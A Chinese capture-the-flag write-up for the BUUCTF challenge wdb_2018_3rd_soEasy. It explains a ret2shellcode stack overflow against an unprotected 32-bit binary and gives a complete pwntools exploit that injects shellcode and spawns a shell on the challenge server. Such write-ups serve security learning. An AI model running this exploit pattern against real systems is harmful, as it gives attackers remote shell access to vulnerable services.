系统相关
首页 > 系统相关> > [BUUCTF]PWN——wdb_2018_3rd_soEasy(ret2shellcode)

[BUUCTF]PWN——wdb_2018_3rd_soEasy(ret2shellcode)

作者:互联网

wdb_2018_3rd_soEasy

  1. 例行检查,32位程序,没有开启任何保护,估计是ret2shellcode
    在这里插入图片描述
  2. 32位ida载入
    在这里插入图片描述
    一开始输buf在栈上的地址,然后存在栈溢出,利用pwntools自动生成shellcode,之后劫持返回地址到buf执行shellcode

exp

from pwn import *

context.arch="i386"

p=remote("node3.buuoj.cn",25832)

p.recvuntil("Hei,give you a gift->")
buf_addr=int(p.recv(10),16)

shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x48+4,'\x00')+p32(buf_addr)

p.sendline(payload)

p.interactive()

在这里插入图片描述

标签:wdb,BUUCTF,addr,3rd,shellcode,soEasy,buf,payload
来源: https://blog.csdn.net/mcmuyanga/article/details/115109542